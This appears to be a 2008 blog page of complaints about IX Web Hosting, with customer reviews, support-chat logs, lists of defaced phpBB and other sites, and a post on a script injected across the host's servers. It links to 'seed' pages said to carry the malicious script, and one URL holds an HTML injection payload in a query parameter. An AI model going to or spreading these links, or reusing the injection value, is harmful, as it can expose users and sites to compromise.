| Enrique Gutierrez, 21st 2008f October, 2008 |
| HORRIBLE!
I was with IX Webhosting for 5 years+ and today they shut my account down due to phishing files that were placed on one of my domains; after they blamed me for the files, that I didn’t place, they proceeded to tell me that they can’t give me access to my files and data. They’re about 20 hours away from being served legal papers for damages and theft, in addition to getting a boot crammed up their asses for being one of the worst web hosting experiences I’ve ever had to deal with in my 9 years of web dev. |
IX web hosted sites Hacked and Defaced December 29th
- http://abcnepal.com/phpBB2/
- http://forums.adeptpcs.com/
- http://www.defaceadd.org/tamekran-767.xml
- http://mallusworld.com/
- http://sw.rzep.net/
- http://myxxonline.com/phpBB2/
- http://happyzoo.com/phpBB2/admin/
- http://yojils.com/forums/
- http://dj-booth.co.uk/forum/
- http://firstbaptist-nyc.org/phpBB2/
- http://webaccess.ingenious.cc/phpBB2/
- http://infrastructurematters.org/phpBB2/
- http://everythingretek.com/phpBB2/viewtopic.php?p=1464
- http://plus.rawfishrecords.com/phpBB2/
- http://quellederjugend.arhaco.com/phpBB2/
- http://mediawirx.net/phpBB2/
- http://www.zavallis.com/
- http://www.nassel.com/news/
- http://www.joshstern.net/phpBB2/viewtopic.php?p=13422..13422
- http://northharrowsnooker.co.uk/
IX Web Hosting and the Yahoo Counter Script Injection
I started this blog just 2 weeks ago, and today I recieved my 1000 th Email asking me about the code that is injected into the footer of every file hosted on seeded IX Web Hosting Servers.
Hundreds of IX customers, are contacting me to ask about the Injected script ( posted in a previous post) they are asking me HOW to remove it, because they cannot find it…
The Reason they cannot find it??
Because of a MASSIVE SECURITY ISSUE on IX WEB HOSTING’s SERVERS!!.. the script is NOT actually put onto any of your pages, the script is actually hidded somewhere on the server..
So far I have found 5 “seeds” .. These are the codes that are appearing in over 100,000 sites
- http://on3photo.com/onlinestore/photos/106-firefighter_foto/1147-gustav_deployment/di_img_0002.jpg
- http://adventuresinstorytelling.com/modlogan/m_usage_200603_001_008.html
Remember to view the “source code” in the above links.
Very interesting is the second “seed” that is actually in an IX standard “modlogan” folder, that is standard a chmod 700 .
Secondly it should not be possible on any shared server to inject this script onto EVERY file on that server. The fact that this is happening means that IX web Hosting has not got a clue how to protect their servers, and customer web sites.
So as you can see, this script IS NOT actually put into your script, that is why you cannot find it.. HOWEVER, somewhere on your site, there is a bit of code ”Calling” this script, and that appears in your pages.
Check ALL the pages that get called for every page, ie. header, footer, index, sidebar etc.
So far I have evidence and proven that the following IX servers running the following Database’s are seeded:
- mysql33.ixwebhosting.com
- mysql15.ixwebhosting.com
- mysql27.ixwebhosting.com
If you know of any others that are seeded, please let me know.
Hope this helps
:: Some people have contacted me to tell me that the Injected Script is ( also ) injected into the database, and in some cases a new table is created.
I have checked 9 databases of infected sites, and I have not yet come across the script in my Database’s, so I think that this might be “script” related, maybe that some scripts such as PhpBB2 allows for this to happen, so I recommend searching your Database for the script as well ::
IX and Hacked and Defaced Dec 24 2008
A short list of sites hosted by IX Web Hosting.. all Hacked and Defaced
http://www.strangeauction.com/wp-login.php
http://annualkellyfamilyreunion.com/forum/
http://sisterwords.com/phpBB2/
http://cr30beachbungalow.mmisiolek.com/phpBB2/
http://hitecpowercontrols.com/x.html
http://jacksonvilleyardsalesonline.com/signinform.php?msg=%3Ch1%3EHacked%20By%20BeLa%3C/h1%3E
http://abacusdiesel.com/phpBB2/
http://www.cardstuff.info/details.php?id=16&kategorie=9&main_kat=4&start=0&nr=
http://mediaportalen.net/index.php?n=modules/users&s=4&t=DESC&p=1&l=results_poll&68cac=off
http://forgottenstory.com/phpBB2/
http://www.mobileintegration.no/
http://krabbeteiner.com/shop/admin/
http://fischertechnologies.com/calendar/
IX Web Hosting Reviews September 2008
bigboytoyauction.com, 20th 2008f September, 2008 |
| Yes still with IX right now all of the mysql servers are down. And if they didn’t do back ups I am kind of screwed as my last back up is on a crashed HD, i can pull it but its a pain. Here is a transcript of the chat Kirill Skripka: Hello, my name is Kirill. How can I help you today? you: all of my sites are down again, www.ckonline.net , www.bigboytoyauction.com , and all of the others too. Kirill Skripka: hold on please, I’ll check Kirill Skripka: our Mysql server is down. Our administrators are fixing it now Kirill Skripka: it will be available again as fast as possible Kirill Skripka: we are sorry you: I dont want to be a pain but stuff like this is happening more often now you: any particular reason why you: Just saying that down time has increased since the move, never had an issue with down time until lately. I hope that the issues are resolved. you: obviously not going to get a response you: have a good day I will be calling IX on monday |
| Jason, 19th 2008f September, 2008 |
| IXWebHosting were always cheap by shady, but recently their customer service has taken a terrible turn for the worse. They popped me with several TOS violations. The first was for using 30 GB of storage of their “unlimited” storage. They COMPLETELY LIE about their storage promise. The other was a supposed Spam complaint that one of their managers agreed was not a valid complaint, but they are still charging me with a SECOND TOS violation. They told me if I get a THIRD TOS violation they will terminate my account without notice, meaning I will loose all my email, etc. Talking to their support people is like talking to high school PE teachers from Siberia. It’s just completely pointless.
AVOID IXWEBHOSTING at all costs!!! They have served their purpose, which is to drive the cost of hosting down, so now go with one of the better competitors. These guys are the worst! I moved to HostMonster who verified, in understandable, clear English, that I can use all 1.5 TB of their promised storage (I won’t use nearly that much, but it’s good to know). |
| Sam, 06th 2008f September, 2008 |
| This hosting Company is very slow, so many problems stay away |
| elawcase@gmail.com, 03rd 2008f September, 2008 |
| I am not sure why this website places Ixwebhosting rating so high when just about NO ONE is happy with them including myself. I have sent a few logs you can read below. These are real examples. Also their server is down quite often so anyone who can recommend a better hosting company that offers hosting unlimited domain names, pls let me know at elawcase@gmail.com |
| elawcase@gmail.com, 03rd 2008f September, 2008 |
| Zeyad Abed: Sorry but from my side it’s ok
you: well, i’ll keep monitoring it.. but thank you for your help you: if possible, if you can try to ask your tech people to monitor it… you: just a moment ago, the site didn’t come up Zeyad Abed: You are welocme Zeyad Abed: Is there anything else I can assist you with? you: that’s all, pls just ask the tech people to check the server.. it slowing down again you: oh it’s okay now you: it’s kind of unstable recently Zeyad Abed: Sorry it’s from your connection you: not my connection, third party monitors you: i always check third party connections/monitors to make sure it is not my connection you: if you can pls check alertra.com and check every few minutes.. you’ll see how much the server is varying in performance you: the worst thing a hosting company can do is blame the client’s connection or website .. it’ just avoids the issue you: the server now is slowing Zeyad Abed: Sorry it’s ok you: well, i guess..thanks for your help.. if you can pls ask the tech people. but for some reason I dont think you will do that Zeyad Abed: Sorry im a technincal you: what do you mean? Zeyad Abed: I mean it’s ok from our side |
| elawcase@gmail.com, 03rd 2008f September, 2008 |
| you: the server now is slowing
Zeyad Abed: Sorry it’s ok you: well, i guess..thanks for your help.. if you can pls ask the tech people. but for some reason I dont think you will do that Zeyad Abed: Sorry im a technincal you: what do you mean? Zeyad Abed: I mean it’s ok from our side |
| elawcase, 03rd 2008f September, 2008 |
| Here is an example of the conversation I had with ixwebshosting when the server was really slow and stalling:
you: i need to check to make sure that the server is performing okay Zeyad Abed: Hold on please let me check it you: thanks Zeyad Abed: You are welcome you: just let me know here.. waiting.. Zeyad Abed: Ok you: get the logs yet? you: or you can also check alertra.com from your end… Zeyad Abed: Just am inute please you: ok Zeyad Abed: alertra.com. 124 IN A 205.162.234.98 Zeyad Abed: ;; Query time: 0 msec Zeyad Abed: flowers.com.hk. 85513 IN A 98.130.191.57 Zeyad Abed: ;; Query time: 0 msec you: the time varies i’m checking now again you: it’s not 0 msec Zeyad Abed: Sorry but from my side it’s ok you: well, i’ll keep monitoring it.. but thank you for your help you: if possible, if you can try to ask your tech people to monitor it… you: just a moment ago, the site didn’t come up Zeyad Abed: You are welocme Zeyad Abed: Is there anything else I can assist you with? you: that’s all, pls just ask the tech people to check the server.. it slowing down again you: oh it’s okay now you: it’s kind of unstable recently Zeyad Abed: Sorry it’s from your connection you: not my connection, third party monitors you: i always check third party connections/monitors to make sure it is not my connection you: if you can pls check alertra.com and check every few minutes.. you’ll see how much the server is varying in performance you: the worst thing a hosting company can do is blame the client’s connection or website .. it’ just avoids the issue you: the server now is slowing Zeyad Abed: Sorry it’s ok |
-
Archives
- November 2009 (1)
- October 2009 (3)
- July 2009 (1)
- May 2009 (4)
- March 2009 (3)
- February 2009 (7)
- January 2009 (12)
- December 2008 (19)
-
Categories
-
RSS
Entries RSS
Comments RSS
